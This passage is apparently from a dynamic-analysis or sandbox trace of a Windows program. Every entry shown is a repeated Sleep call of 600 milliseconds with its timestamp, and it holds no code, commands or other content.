(dwMilliseconds=0x258) [0262.691] Sleep (dwMilliseconds=0x258) [0262.738] Sleep (dwMilliseconds=0x258) [0262.759] Sleep (dwMilliseconds=0x258) [0262.797] Sleep (dwMilliseconds=0x258) [0262.800] Sleep (dwMilliseconds=0x258) [0262.816] Sleep (dwMilliseconds=0x258) [0262.832] Sleep (dwMilliseconds=0x258) [0262.894] Sleep (dwMilliseconds=0x258) [0262.942] Sleep (dwMilliseconds=0x258) [0262.966] Sleep (dwMilliseconds=0x258) [0262.972] Sleep (dwMilliseconds=0x258) [0262.999] Sleep (dwMilliseconds=0x258) [0263.003] Sleep (dwMilliseconds=0x258) [0263.019] Sleep (dwMilliseconds=0x258) [0263.036] Sleep (dwMilliseconds=0x258) [0263.098] Sleep (dwMilliseconds=0x258) [0263.144] Sleep (dwMilliseconds=0x258) [0263.183] Sleep (dwMilliseconds=0x258) [0263.191] Sleep (dwMilliseconds=0x258) [0263.207] Sleep (dwMilliseconds=0x258) [0263.222] Sleep (dwMilliseconds=0x258) [0263.237] Sleep (dwMilliseconds=0x258) [0263.254] Sleep (dwMilliseconds=0x258) [0263.316] Sleep (dwMilliseconds=0x258) [0263.363] Sleep (dwMilliseconds=0x258) [0263.392] Sleep (dwMilliseconds=0x258) [0263.393] Sleep (dwMilliseconds=0x258) [0263.409] Sleep (dwMilliseconds=0x258) [0263.426] Sleep (dwMilliseconds=0x258) [0263.440] Sleep (dwMilliseconds=0x258) [0263.456] Sleep (dwMilliseconds=0x258) [0263.471] Sleep (dwMilliseconds=0x258) [0263.534] Sleep (dwMilliseconds=0x258) [0263.580] Sleep (dwMilliseconds=0x258) [0263.604] Sleep (dwMilliseconds=0x258) [0263.611] Sleep (dwMilliseconds=0x258) [0263.627] Sleep (dwMilliseconds=0x258) [0263.646] Sleep (dwMilliseconds=0x258) [0263.659] Sleep (dwMilliseconds=0x258) [0263.674] Sleep (dwMilliseconds=0x258) [0263.736] Sleep (dwMilliseconds=0x258) [0263.801] Sleep (dwMilliseconds=0x258) [0263.826] Sleep (dwMilliseconds=0x258) [0263.830] Sleep (dwMilliseconds=0x258) [0263.846] Sleep (dwMilliseconds=0x258) [0263.862] Sleep (dwMilliseconds=0x258) [0263.877] Sleep (dwMilliseconds=0x258) [0263.893] Sleep (dwMilliseconds=0x258) [0263.956] Sleep (dwMilliseconds=0x258) [0264.003] Sleep (dwMilliseconds=0x258) [0264.047] Sleep (dwMilliseconds=0x258) [0264.049] Sleep (dwMilliseconds=0x258) [0264.064] Sleep (dwMilliseconds=0x258) [0264.093] Sleep (dwMilliseconds=0x258) [0264.097] Sleep (dwMilliseconds=0x258) [0264.111] Sleep (dwMilliseconds=0x258) [0264.158] Sleep (dwMilliseconds=0x258) [0264.205] Sleep (dwMilliseconds=0x258) [0264.244] Sleep (dwMilliseconds=0x258) [0264.252] Sleep (dwMilliseconds=0x258) [0264.268] Sleep (dwMilliseconds=0x258) [0264.283] Sleep (dwMilliseconds=0x258) [0264.298] Sleep (dwMilliseconds=0x258) [0264.314] Sleep (dwMilliseconds=0x258) [0264.376] Sleep (dwMilliseconds=0x258) [0264.423] Sleep (dwMilliseconds=0x258) [0264.460] Sleep (dwMilliseconds=0x258) [0264.472] Sleep (dwMilliseconds=0x258) [0264.487] Sleep (dwMilliseconds=0x258) [0264.501] Sleep (dwMilliseconds=0x258) [0264.516] Sleep (dwMilliseconds=0x258) [0264.532] Sleep (dwMilliseconds=0x258) [0264.595] Sleep (dwMilliseconds=0x258) [0264.641] Sleep (dwMilliseconds=0x258) [0264.670] Sleep (dwMilliseconds=0x258) [0264.672] Sleep (dwMilliseconds=0x258) [0264.689] Sleep (dwMilliseconds=0x258) [0264.704] Sleep (dwMilliseconds=0x258) [0264.719] Sleep (dwMilliseconds=0x258) [0264.735] Sleep (dwMilliseconds=0x258) [0264.750] Sleep (dwMilliseconds=0x258) [0264.828] Sleep (dwMilliseconds=0x258) [0264.875] Sleep (dwMilliseconds=0x258) [0264.904] Sleep (dwMilliseconds=0x258) [0264.907] Sleep (dwMilliseconds=0x258) [0264.922] Sleep (dwMilliseconds=0x258) [0264.938] Sleep (dwMilliseconds=0x258) [0264.953] Sleep (dwMilliseconds=0x258) [0264.969] Sleep (dwMilliseconds=0x258) [0264.984] Sleep (dwMilliseconds=0x258) [0265.047] Sleep (dwMilliseconds=0x258) [0265.095] Sleep (dwMilliseconds=0x258) [0265.128] Sleep (dwMilliseconds=0x258) [0265.140] Sleep (dwMilliseconds=0x258) [0265.156] Sleep (dwMilliseconds=0x258) [0265.172] Sleep (dwMilliseconds=0x258) [0265.187] Sleep (dwMilliseconds=0x258) [0265.203] Sleep (dwMilliseconds=0x258) [0265.266] Sleep (dwMilliseconds=0x258) [0265.312] Sleep (dwMilliseconds=0x258) [0265.340] Sleep (dwMilliseconds=0x258) [0265.348] Sleep (dwMilliseconds=0x258) [0265.361] Sleep (dwMilliseconds=0x258) [0265.378] Sleep (dwMilliseconds=0x258) [0265.390] Sleep (dwMilliseconds=0x258) [0265.406] Sleep (dwMilliseconds=0x258) [0265.422] Sleep (dwMilliseconds=0x258) [0265.483] Sleep (dwMilliseconds=0x258) [0265.539] Sleep (dwMilliseconds=0x258) [0265.546] Sleep (dwMilliseconds=0x258) [0265.562] Sleep (dwMilliseconds=0x258) [0265.577] Sleep (dwMilliseconds=0x258) [0265.593] Sleep (dwMilliseconds=0x258) [0265.608] Sleep (dwMilliseconds=0x258) [0265.624] Sleep (dwMilliseconds=0x258) [0265.686] Sleep (dwMilliseconds=0x258) [0265.733] Sleep (dwMilliseconds=0x258) [0265.755] Sleep (dwMilliseconds=0x258) [0265.784] Sleep (dwMilliseconds=0x258) [0265.796] Sleep (dwMilliseconds=0x258) [0265.811] Sleep (dwMilliseconds=0x258) [0265.827] Sleep (dwMilliseconds=0x258) [0265.889] Sleep (dwMilliseconds=0x258) [0265.936] Sleep (dwMilliseconds=0x258) [0265.963] Sleep (dwMilliseconds=0x258) [0265.967] Sleep (dwMilliseconds=0x258) [0265.983] Sleep (dwMilliseconds=0x258) [0265.999] Sleep (dwMilliseconds=0x258) [0266.014] Sleep (dwMilliseconds=0x258) [0266.030] Sleep (dwMilliseconds=0x258) [0266.093] Sleep (dwMilliseconds=0x258) [0266.139] Sleep (dwMilliseconds=0x258) [0266.164] Sleep (dwMilliseconds=0x258) [0266.178] Sleep (dwMilliseconds=0x258) [0266.185] Sleep (dwMilliseconds=0x258) [0266.202] Sleep (dwMilliseconds=0x258) [0266.217] Sleep (dwMilliseconds=0x258) [0266.232] Sleep (dwMilliseconds=0x258) [0266.248] Sleep (dwMilliseconds=0x258) [0266.311] Sleep (dwMilliseconds=0x258) [0266.358] Sleep (dwMilliseconds=0x258) [0266.396] Sleep (dwMilliseconds=0x258) [0266.404] Sleep (dwMilliseconds=0x258) [0266.422] Sleep (dwMilliseconds=0x258) [0266.435] Sleep (dwMilliseconds=0x258) [0266.451] Sleep (dwMilliseconds=0x258) [0266.466] Sleep (dwMilliseconds=0x258) [0266.530] Sleep (dwMilliseconds=0x258) [0266.576] Sleep (dwMilliseconds=0x258) [0266.592] Sleep (dwMilliseconds=0x258) [0266.608] Sleep (dwMilliseconds=0x258) [0266.622] Sleep (dwMilliseconds=0x258) [0266.639] Sleep (dwMilliseconds=0x258) [0266.654] Sleep (dwMilliseconds=0x258) [0266.669] Sleep (dwMilliseconds=0x258) [0266.731] Sleep (dwMilliseconds=0x258) [0266.796] Sleep (dwMilliseconds=0x258) [0266.841] Sleep (dwMilliseconds=0x258) [0266.856] Sleep (dwMilliseconds=0x258) [0266.872] Sleep (dwMilliseconds=0x258) [0266.888] Sleep (dwMilliseconds=0x258) [0266.904] Sleep (dwMilliseconds=0x258) [0266.966] Sleep (dwMilliseconds=0x258) [0267.013] Sleep (dwMilliseconds=0x258) [0267.028] Sleep (dwMilliseconds=0x258) [0267.043] Sleep (dwMilliseconds=0x258) [0267.059] Sleep (dwMilliseconds=0x258) [0267.075] Sleep (dwMilliseconds=0x258) [0267.090] Sleep (dwMilliseconds=0x258) [0267.106] Sleep (dwMilliseconds=0x258) [0267.184] Sleep (dwMilliseconds=0x258) [0267.232] Sleep (dwMilliseconds=0x258) [0267.258] Sleep (dwMilliseconds=0x258) [0267.262] Sleep (dwMilliseconds=0x258) [0267.278] Sleep (dwMilliseconds=0x258) [0267.293] Sleep (dwMilliseconds=0x258) [0267.309] Sleep (dwMilliseconds=0x258) [0267.324] Sleep (dwMilliseconds=0x258) [0267.341] Sleep (dwMilliseconds=0x258) [0267.403] Sleep (dwMilliseconds=0x258) [0267.457] Sleep (dwMilliseconds=0x258) [0267.467] Sleep (dwMilliseconds=0x258) [0267.480] Sleep (dwMilliseconds=0x258) [0267.496] Sleep (dwMilliseconds=0x258) [0267.512] Sleep (dwMilliseconds=0x258) [0267.527] Sleep (dwMilliseconds=0x258) [0267.543] Sleep (dwMilliseconds=0x258) [0267.605] Sleep (dwMilliseconds=0x258) [0267.653] Sleep (dwMilliseconds=0x258) [0267.667] Sleep (dwMilliseconds=0x258) [0267.685] Sleep (dwMilliseconds=0x258) [0267.699] Sleep (dwMilliseconds=0x258) [0267.715] Sleep (dwMilliseconds=0x258) [0267.730] Sleep (dwMilliseconds=0x258) [0267.746] Sleep (dwMilliseconds=0x258) [0267.832] Sleep (dwMilliseconds=0x258) [0267.870] Sleep (dwMilliseconds=0x258) [0267.895] Sleep (dwMilliseconds=0x258) [0267.901] Sleep (dwMilliseconds=0x258) [0267.917] Sleep (dwMilliseconds=0x258) [0267.933] Sleep (dwMilliseconds=0x258) [0267.948] Sleep (dwMilliseconds=0x258) [0267.964] Sleep (dwMilliseconds=0x258) [0268.028] Sleep (dwMilliseconds=0x258) [0268.073] Sleep (dwMilliseconds=0x258) [0268.119] Sleep (dwMilliseconds=0x258) [0268.120] Sleep (dwMilliseconds=0x258) [0268.139] Sleep (dwMilliseconds=0x258) [0268.152] Sleep (dwMilliseconds=0x258) [0268.167] Sleep (dwMilliseconds=0x258) [0268.193] Sleep (dwMilliseconds=0x258) [0268.245] Sleep (dwMilliseconds=0x258) [0268.293] Sleep (dwMilliseconds=0x258) [0268.332] Sleep (dwMilliseconds=0x258) [0268.338] Sleep (dwMilliseconds=0x258) [0268.354] Sleep (dwMilliseconds=0x258) [0268.370] Sleep (dwMilliseconds=0x258) [0268.385] Sleep (dwMilliseconds=0x258) [0268.401] Sleep (dwMilliseconds=0x258) [0268.463] Sleep (dwMilliseconds=0x258) [0268.511] Sleep (dwMilliseconds=0x258) [0268.528] Sleep (dwMilliseconds=0x258) [0268.541] Sleep (dwMilliseconds=0x258) [0268.557] Sleep (dwMilliseconds=0x258) [0268.573] Sleep (dwMilliseconds=0x258) [0268.588] Sleep (dwMilliseconds=0x258) [0268.603] Sleep (dwMilliseconds=0x258) [0268.650] Sleep (dwMilliseconds=0x258) [0268.697] Sleep (dwMilliseconds=0x258) [0268.731] Sleep (dwMilliseconds=0x258) [0268.744] Sleep (dwMilliseconds=0x258) [0268.788] Sleep (dwMilliseconds=0x258) [0268.791] Sleep (dwMilliseconds=0x258) [0268.806] Sleep (dwMilliseconds=0x258) [0268.869] Sleep (dwMilliseconds=0x258) [0268.915] Sleep (dwMilliseconds=0x258) [0268.956] Sleep (dwMilliseconds=0x258) [0268.962] Sleep (dwMilliseconds=0x258) [0268.980] Sleep (dwMilliseconds=0x258) [0268.994] Sleep (dwMilliseconds=0x258) [0269.009] Sleep (dwMilliseconds=0x258) [0269.071] Sleep (dwMilliseconds=0x258) [0269.118] Sleep (dwMilliseconds=0x258) [0269.141] Sleep (dwMilliseconds=0x258) [0269.149] Sleep (dwMilliseconds=0x258) [0269.166] Sleep (dwMilliseconds=0x258) [0269.181] Sleep (dwMilliseconds=0x258) [0269.204] Sleep (dwMilliseconds=0x258) [0269.212] Sleep (dwMilliseconds=0x258) [0269.275] Sleep (dwMilliseconds=0x258) [0269.321] Sleep (dwMilliseconds=0x258) [0269.340] Sleep (dwMilliseconds=0x258) [0269.352] Sleep (dwMilliseconds=0x258) [0269.378] Sleep (dwMilliseconds=0x258) [0269.384] Sleep (dwMilliseconds=0x258) [0269.399] Sleep (dwMilliseconds=0x258) [0269.424] Sleep (dwMilliseconds=0x258) [0269.478] Sleep (dwMilliseconds=0x258) [0269.525] Sleep (dwMilliseconds=0x258) [0269.566] Sleep (dwMilliseconds=0x258) [0269.577] Sleep (dwMilliseconds=0x258) [0269.588] Sleep (dwMilliseconds=0x258) [0269.602] Sleep (dwMilliseconds=0x258) [0269.618] Sleep (dwMilliseconds=0x258) [0269.635] Sleep (dwMilliseconds=0x258) [0269.696] Sleep (dwMilliseconds=0x258) [0269.742] Sleep (dwMilliseconds=0x258) [0269.772] Sleep (dwMilliseconds=0x258) [0269.773] Sleep (dwMilliseconds=0x258) [0269.789] Sleep (dwMilliseconds=0x258) [0269.806] Sleep (dwMilliseconds=0x258) [0269.821] Sleep (dwMilliseconds=0x258) [0269.836] Sleep (dwMilliseconds=0x258) [0269.898] Sleep (dwMilliseconds=0x258) [0269.946] Sleep (dwMilliseconds=0x258) [0269.965] Sleep (dwMilliseconds=0x258) [0269.976] Sleep (dwMilliseconds=0x258) [0269.992] Sleep (dwMilliseconds=0x258) [0270.009] Sleep (dwMilliseconds=0x258) [0270.023] Sleep (dwMilliseconds=0x258) [0270.039] Sleep (dwMilliseconds=0x258) [0270.101] Sleep (dwMilliseconds=0x258) [0270.148] Sleep (dwMilliseconds=0x258) [0270.179] Sleep (dwMilliseconds=0x258) [0270.196] Sleep (dwMilliseconds=0x258) [0270.214] Sleep (dwMilliseconds=0x258) [0270.226] Sleep (dwMilliseconds=0x258) [0270.242] Sleep (dwMilliseconds=0x258) [0270.304] Sleep (dwMilliseconds=0x258) [0270.351] Sleep (dwMilliseconds=0x258) [0270.382] Sleep (dwMilliseconds=0x258) [0270.398] Sleep (dwMilliseconds=0x258) [0270.440] Sleep (dwMilliseconds=0x258) [0270.444] Sleep (dwMilliseconds=0x258) [0270.461] Sleep (dwMilliseconds=0x258) [0270.523] Sleep (dwMilliseconds=0x258) [0270.572] Sleep (dwMilliseconds=0x258) [0270.600] Sleep (dwMilliseconds=0x258) [0270.600] Sleep (dwMilliseconds=0x258) [0270.616] Sleep (dwMilliseconds=0x258) [0270.633] Sleep (dwMilliseconds=0x258) [0270.647] Sleep (dwMilliseconds=0x258) [0270.663] Sleep (dwMilliseconds=0x258) [0270.679] Sleep (dwMilliseconds=0x258) [0270.744] Sleep (dwMilliseconds=0x258) [0270.803] Sleep (dwMilliseconds=0x258) [0270.837] Sleep (dwMilliseconds=0x258) [0270.851] Sleep (dwMilliseconds=0x258) [0270.866] Sleep (dwMilliseconds=0x258) [0270.881] Sleep (dwMilliseconds=0x258) [0270.897] Sleep (dwMilliseconds=0x258) [0270.963] Sleep (dwMilliseconds=0x258) [0271.006] Sleep (dwMilliseconds=0x258) [0271.045] Sleep (dwMilliseconds=0x258) [0271.053] Sleep (dwMilliseconds=0x258) [0271.069] Sleep (dwMilliseconds=0x258) [0271.088] Sleep (dwMilliseconds=0x258) [0271.099] Sleep (dwMilliseconds=0x258) [0271.115] Sleep (dwMilliseconds=0x258) [0271.178] Sleep (dwMilliseconds=0x258) [0271.224] Sleep (dwMilliseconds=0x258) [0271.259] Sleep (dwMilliseconds=0x258) [0271.281] Sleep (dwMilliseconds=0x258) [0271.287] Sleep (dwMilliseconds=0x258) [0271.302] Sleep (dwMilliseconds=0x258) [0271.318] Sleep (dwMilliseconds=0x258) [0271.335] Sleep (dwMilliseconds=0x258) [0271.397] Sleep (dwMilliseconds=0x258) [0271.443] Sleep (dwMilliseconds=0x258) [0271.497] Sleep (dwMilliseconds=0x258) [0271.507] Sleep (dwMilliseconds=0x258) [0271.521] Sleep (dwMilliseconds=0x258) [0271.537] Sleep (dwMilliseconds=0x258) [0271.552] Sleep (dwMilliseconds=0x258) [0271.615] Sleep (dwMilliseconds=0x258) [0271.661] Sleep (dwMilliseconds=0x258) [0271.678] Sleep (dwMilliseconds=0x258) [0271.692] Sleep (dwMilliseconds=0x258) [0271.708] Sleep (dwMilliseconds=0x258) [0271.727] Sleep (dwMilliseconds=0x258) [0271.739] Sleep (dwMilliseconds=0x258) [0271.755] Sleep (dwMilliseconds=0x258) [0271.834] Sleep (dwMilliseconds=0x258) [0271.879] Sleep (dwMilliseconds=0x258) [0271.923] Sleep (dwMilliseconds=0x258) [0271.926] Sleep (dwMilliseconds=0x258) [0271.943] Sleep (dwMilliseconds=0x258) [0271.957] Sleep (dwMilliseconds=0x258) [0271.973] Sleep (dwMilliseconds=0x258) [0271.989] Sleep (dwMilliseconds=0x258) [0272.052] Sleep (dwMilliseconds=0x258) [0272.098] Sleep (dwMilliseconds=0x258) [0272.122] Sleep (dwMilliseconds=0x258) [0272.129] Sleep (dwMilliseconds=0x258) [0272.145] Sleep (dwMilliseconds=0x258) [0272.162] Sleep (dwMilliseconds=0x258) [0272.176] Sleep (dwMilliseconds=0x258) [0272.191] Sleep (dwMilliseconds=0x258) [0272.279] Sleep (dwMilliseconds=0x258) [0272.316] Sleep (dwMilliseconds=0x258) [0272.353] Sleep (dwMilliseconds=0x258) [0272.363] Sleep (dwMilliseconds=0x258) [0272.380] Sleep (dwMilliseconds=0x258) [0272.394] Sleep (dwMilliseconds=0x258) [0272.410] Sleep (dwMilliseconds=0x258) [0272.426] Sleep (dwMilliseconds=0x258) [0272.488] Sleep (dwMilliseconds=0x258) [0272.536] Sleep (dwMilliseconds=0x258) [0272.555] Sleep (dwMilliseconds=0x258) [0272.566] Sleep (dwMilliseconds=0x258) [0272.582] Sleep (dwMilliseconds=0x258) [0272.598] Sleep (dwMilliseconds=0x258) [0272.615] Sleep (dwMilliseconds=0x258) [0272.628] Sleep (dwMilliseconds=0x258) [0272.691] Sleep (dwMilliseconds=0x258) [0272.738] Sleep (dwMilliseconds=0x258) [0272.757] Sleep (dwMilliseconds=0x258) [0272.788] Sleep (dwMilliseconds=0x258) [0272.800] Sleep (dwMilliseconds=0x258) [0272.816] Sleep (dwMilliseconds=0x258) [0272.833] Sleep (dwMilliseconds=0x258) [0272.941] Sleep (dwMilliseconds=0x258) [0272.989] Sleep (dwMilliseconds=0x258) [0273.004] Sleep (dwMilliseconds=0x258) [0273.018] Sleep (dwMilliseconds=0x258) [0273.034] Sleep (dwMilliseconds=0x258) [0273.053] Sleep (dwMilliseconds=0x258) [0273.065] Sleep (dwMilliseconds=0x258) [0273.081] Sleep (dwMilliseconds=0x258) [0273.143] Sleep (dwMilliseconds=0x258) [0273.190] Sleep (dwMilliseconds=0x258) [0273.207] Sleep (dwMilliseconds=0x258) [0273.223] Sleep (dwMilliseconds=0x258) [0273.237] Sleep (dwMilliseconds=0x258) [0273.253] Sleep (dwMilliseconds=0x258) [0273.268] Sleep (dwMilliseconds=0x258) [0273.284] Sleep (dwMilliseconds=0x258) [0273.346] Sleep (dwMilliseconds=0x258) [0273.394] Sleep (dwMilliseconds=0x258) [0273.413] Sleep (dwMilliseconds=0x258) [0273.424] Sleep (dwMilliseconds=0x258) [0273.440] Sleep (dwMilliseconds=0x258) [0273.455] Sleep (dwMilliseconds=0x258) [0273.471] Sleep (dwMilliseconds=0x258) [0273.486] Sleep (dwMilliseconds=0x258) [0273.549] Sleep (dwMilliseconds=0x258) [0273.596] Sleep (dwMilliseconds=0x258) [0273.617] Sleep (dwMilliseconds=0x258) [0273.627] Sleep (dwMilliseconds=0x258) [0273.642] Sleep (dwMilliseconds=0x258) [0273.658] Sleep (dwMilliseconds=0x258) [0273.673] Sleep (dwMilliseconds=0x258) [0273.689] Sleep (dwMilliseconds=0x258) [0273.752] Sleep (dwMilliseconds=0x258) [0273.798] Sleep (dwMilliseconds=0x258) [0273.830] Sleep (dwMilliseconds=0x258) [0273.845] Sleep (dwMilliseconds=0x258) [0273.861] Sleep (dwMilliseconds=0x258) [0273.876] Sleep (dwMilliseconds=0x258) [0273.892] Sleep (dwMilliseconds=0x258) [0273.955] Sleep (dwMilliseconds=0x258) [0274.001] Sleep (dwMilliseconds=0x258) [0274.032] Sleep (dwMilliseconds=0x258) [0274.048] Sleep (dwMilliseconds=0x258) [0274.065] Sleep (dwMilliseconds=0x258) [0274.079] Sleep (dwMilliseconds=0x258) [0274.095] Sleep (dwMilliseconds=0x258) [0274.111] Sleep (dwMilliseconds=0x258) [0274.173] Sleep (dwMilliseconds=0x258) [0274.220] Sleep (dwMilliseconds=0x258) [0274.241] Sleep (dwMilliseconds=0x258) [0274.251] Sleep (dwMilliseconds=0x258) [0274.266] Sleep (dwMilliseconds=0x258) [0274.299] Sleep (dwMilliseconds=0x258) [0274.313] Sleep (dwMilliseconds=0x258) [0274.375] Sleep (dwMilliseconds=0x258) [0274.423] Sleep (dwMilliseconds=0x258) [0274.439] Sleep (dwMilliseconds=0x258) [0274.453] Sleep (dwMilliseconds=0x258) [0274.469] Sleep (dwMilliseconds=0x258) [0274.486] Sleep (dwMilliseconds=0x258) [0274.500] Sleep (dwMilliseconds=0x258) [0274.516] Sleep (dwMilliseconds=0x258) [0274.578] Sleep (dwMilliseconds=0x258) [0274.626] Sleep (dwMilliseconds=0x258) [0274.642] Sleep (dwMilliseconds=0x258) [0274.656] Sleep (dwMilliseconds=0x258) [0274.672] Sleep (dwMilliseconds=0x258) [0274.688] Sleep (dwMilliseconds=0x258) [0274.703] Sleep (dwMilliseconds=0x258) [0274.719] Sleep (dwMilliseconds=0x258) [0274.781] Sleep (dwMilliseconds=0x258) [0274.828] Sleep (dwMilliseconds=0x258) [0274.864] Sleep (dwMilliseconds=0x258) [0274.875] Sleep (dwMilliseconds=0x258) [0274.892] Sleep (dwMilliseconds=0x258) [0274.906] Sleep (dwMilliseconds=0x258) [0274.922] Sleep (dwMilliseconds=0x258) [0274.937] Sleep (dwMilliseconds=0x258) [0275.000] Sleep (dwMilliseconds=0x258) [0275.046] Sleep (dwMilliseconds=0x258) [0275.083] Sleep (dwMilliseconds=0x258) [0275.093] Sleep (dwMilliseconds=0x258) [0275.110] Sleep (dwMilliseconds=0x258) [0275.124] Sleep (dwMilliseconds=0x258) [0275.140] Sleep (dwMilliseconds=0x258) [0275.156] Sleep (dwMilliseconds=0x258) [0275.219] Sleep (dwMilliseconds=0x258) [0275.266] Sleep (dwMilliseconds=0x258) [0275.295] Sleep (dwMilliseconds=0x258) [0275.296] Sleep (dwMilliseconds=0x258) [0275.311] Sleep (dwMilliseconds=0x258) [0275.328] Sleep (dwMilliseconds=0x258) [0275.343] Sleep (dwMilliseconds=0x258) [0275.360] Sleep (dwMilliseconds=0x258) [0275.374] Sleep (dwMilliseconds=0x258) [0275.437] Sleep (dwMilliseconds=0x258) [0275.483] Sleep (dwMilliseconds=0x258) [0275.527] Sleep (dwMilliseconds=0x258) [0275.530] Sleep (dwMilliseconds=0x258) [0275.547] Sleep (dwMilliseconds=0x258) [0275.561] Sleep (dwMilliseconds=0x258) [0275.577] Sleep (dwMilliseconds=0x258) [0275.592] Sleep (dwMilliseconds=0x258) [0275.656] Sleep (dwMilliseconds=0x258) [0275.702] Sleep (dwMilliseconds=0x258) [0275.741] Sleep (dwMilliseconds=0x258) [0275.748] Sleep (dwMilliseconds=0x258) [0275.779] Sleep (dwMilliseconds=0x258) [0275.795] Sleep (dwMilliseconds=0x258) [0275.811] Sleep (dwMilliseconds=0x258) [0275.873] Sleep (dwMilliseconds=0x258) [0275.921] Sleep (dwMilliseconds=0x258) [0275.961] Sleep (dwMilliseconds=0x258) [0275.967] Sleep (dwMilliseconds=0x258) [0275.983] Sleep (dwMilliseconds=0x258) [0275.998] Sleep (dwMilliseconds=0x258) [0276.014] Sleep (dwMilliseconds=0x258) [0276.034] Sleep (dwMilliseconds=0x258) [0276.092] Sleep (dwMilliseconds=0x258) [0276.139] Sleep (dwMilliseconds=0x258) [0276.178] Sleep (dwMilliseconds=0x258) [0276.185] Sleep (dwMilliseconds=0x258) [0276.201] Sleep (dwMilliseconds=0x258) [0276.216] Sleep (dwMilliseconds=0x258) [0276.232] Sleep (dwMilliseconds=0x258) [0276.249] Sleep (dwMilliseconds=0x258) [0276.310] Sleep (dwMilliseconds=0x258) [0276.370] Sleep (dwMilliseconds=0x258) [0276.393] Sleep (dwMilliseconds=0x258) [0276.403] Sleep (dwMilliseconds=0x258) [0276.419] Sleep (dwMilliseconds=0x258) [0276.435] Sleep (dwMilliseconds=0x258) [0276.450] Sleep (dwMilliseconds=0x258) [0276.466] Sleep (dwMilliseconds=0x258) [0276.528] Sleep (dwMilliseconds=0x258) [0276.576] Sleep (dwMilliseconds=0x258) [0276.606] Sleep (dwMilliseconds=0x258) [0276.622] Sleep (dwMilliseconds=0x258) [0276.638] Sleep (dwMilliseconds=0x258) [0276.653] Sleep (dwMilliseconds=0x258) [0276.669] Sleep (dwMilliseconds=0x258) [0276.731] Sleep (dwMilliseconds=0x258) [0276.778] Sleep (dwMilliseconds=0x258) [0276.826] Sleep (dwMilliseconds=0x258) [0276.840] Sleep (dwMilliseconds=0x258) [0276.856] Sleep (dwMilliseconds=0x258) [0276.871] Sleep (dwMilliseconds=0x258) [0276.888] Sleep (dwMilliseconds=0x258) [0276.949] Sleep (dwMilliseconds=0x258) [0276.996] Sleep (dwMilliseconds=0x258) [0277.043] Sleep (dwMilliseconds=0x258) [0277.043] Sleep (dwMilliseconds=0x258) [0277.059] Sleep (dwMilliseconds=0x258) [0277.074] Sleep (dwMilliseconds=0x258) [0277.090] Sleep (dwMilliseconds=0x258) [0277.106] Sleep (dwMilliseconds=0x258) [0277.168] Sleep (dwMilliseconds=0x258) [0277.215] Sleep (dwMilliseconds=0x258) [0277.256] Sleep (dwMilliseconds=0x258) [0277.261] Sleep (dwMilliseconds=0x258) [0277.277] Sleep (dwMilliseconds=0x258) [0277.295] Sleep (dwMilliseconds=0x258) [0277.308] Sleep (dwMilliseconds=0x258) [0277.324] Sleep (dwMilliseconds=0x258) [0277.402] Sleep (dwMilliseconds=0x258) [0277.450] Sleep (dwMilliseconds=0x258) [0277.496] Sleep (dwMilliseconds=0x258) [0277.516] Sleep (dwMilliseconds=0x258) [0277.527] Sleep (dwMilliseconds=0x258) [0277.542] Sleep (dwMilliseconds=0x258) [0277.559] Sleep (dwMilliseconds=0x258) [0277.620] Sleep (dwMilliseconds=0x258) [0277.668] Sleep (dwMilliseconds=0x258) [0277.692] Sleep (dwMilliseconds=0x258) [0277.698] Sleep (dwMilliseconds=0x258) [0277.714] Sleep (dwMilliseconds=0x258) [0277.730] Sleep (dwMilliseconds=0x258) [0277.745] Sleep (dwMilliseconds=0x258) [0277.771] Sleep (dwMilliseconds=0x258) [0277.777] Sleep (dwMilliseconds=0x258) [0277.839] Sleep (dwMilliseconds=0x258) [0277.886] Sleep (dwMilliseconds=0x258) [0277.905] Sleep (dwMilliseconds=0x258) [0277.917] Sleep (dwMilliseconds=0x258) [0277.932] Sleep (dwMilliseconds=0x258) [0277.948] Sleep (dwMilliseconds=0x258) [0277.964] Sleep (dwMilliseconds=0x258) [0277.980] Sleep (dwMilliseconds=0x258) [0278.042] Sleep (dwMilliseconds=0x258) [0278.090] Sleep (dwMilliseconds=0x258) [0278.138] Sleep (dwMilliseconds=0x258) [0278.151] Sleep (dwMilliseconds=0x258) [0278.167] Sleep (dwMilliseconds=0x258) [0278.182] Sleep (dwMilliseconds=0x258) [0278.199] Sleep (dwMilliseconds=0x258) [0278.260] Sleep (dwMilliseconds=0x258) [0278.308] Sleep (dwMilliseconds=0x258) [0278.344] Sleep (dwMilliseconds=0x258) [0278.354] Sleep (dwMilliseconds=0x258) [0278.369] Sleep (dwMilliseconds=0x258) [0278.385] Sleep (dwMilliseconds=0x258) [0278.401] Sleep (dwMilliseconds=0x258) [0278.419] Sleep (dwMilliseconds=0x258) [0278.479] Sleep (dwMilliseconds=0x258) [0278.526] Sleep (dwMilliseconds=0x258) [0278.556] Sleep (dwMilliseconds=0x258) [0278.556] Sleep (dwMilliseconds=0x258) [0278.572] Sleep (dwMilliseconds=0x258) [0278.588] Sleep (dwMilliseconds=0x258) [0278.603] Sleep (dwMilliseconds=0x258) [0278.619] Sleep (dwMilliseconds=0x258) [0278.636] Sleep (dwMilliseconds=0x258) [0278.697] Sleep (dwMilliseconds=0x258) [0278.745] Sleep (dwMilliseconds=0x258) [0278.803] Sleep (dwMilliseconds=0x258) [0278.806] Sleep (dwMilliseconds=0x258) [0278.822] Sleep (dwMilliseconds=0x258) [0278.837] Sleep (dwMilliseconds=0x258) [0278.855] Sleep (dwMilliseconds=0x258) [0278.868] Sleep (dwMilliseconds=0x258) [0278.931] Sleep (dwMilliseconds=0x258) [0278.979] Sleep (dwMilliseconds=0x258) [0279.008] Sleep (dwMilliseconds=0x258) [0279.009] Sleep (dwMilliseconds=0x258) [0279.024] Sleep (dwMilliseconds=0x258) [0279.040] Sleep (dwMilliseconds=0x258) [0279.056] Sleep (dwMilliseconds=0x258) [0279.071] Sleep (dwMilliseconds=0x258) [0279.088] Sleep (dwMilliseconds=0x258) [0279.149] Sleep (dwMilliseconds=0x258) [0279.197] Sleep (dwMilliseconds=0x258) [0279.213] Sleep (dwMilliseconds=0x258) [0279.227] Sleep (dwMilliseconds=0x258) [0279.243] Sleep (dwMilliseconds=0x258) [0279.259] Sleep (dwMilliseconds=0x258) [0279.275] Sleep (dwMilliseconds=0x258) [0279.290] Sleep (dwMilliseconds=0x258) [0279.352] Sleep (dwMilliseconds=0x258) [0279.399] Sleep (dwMilliseconds=0x258) [0279.428] Sleep (dwMilliseconds=0x258) [0279.443] Sleep (dwMilliseconds=0x258) [0279.445] Sleep (dwMilliseconds=0x258) [0279.461] Sleep (dwMilliseconds=0x258) [0279.477] 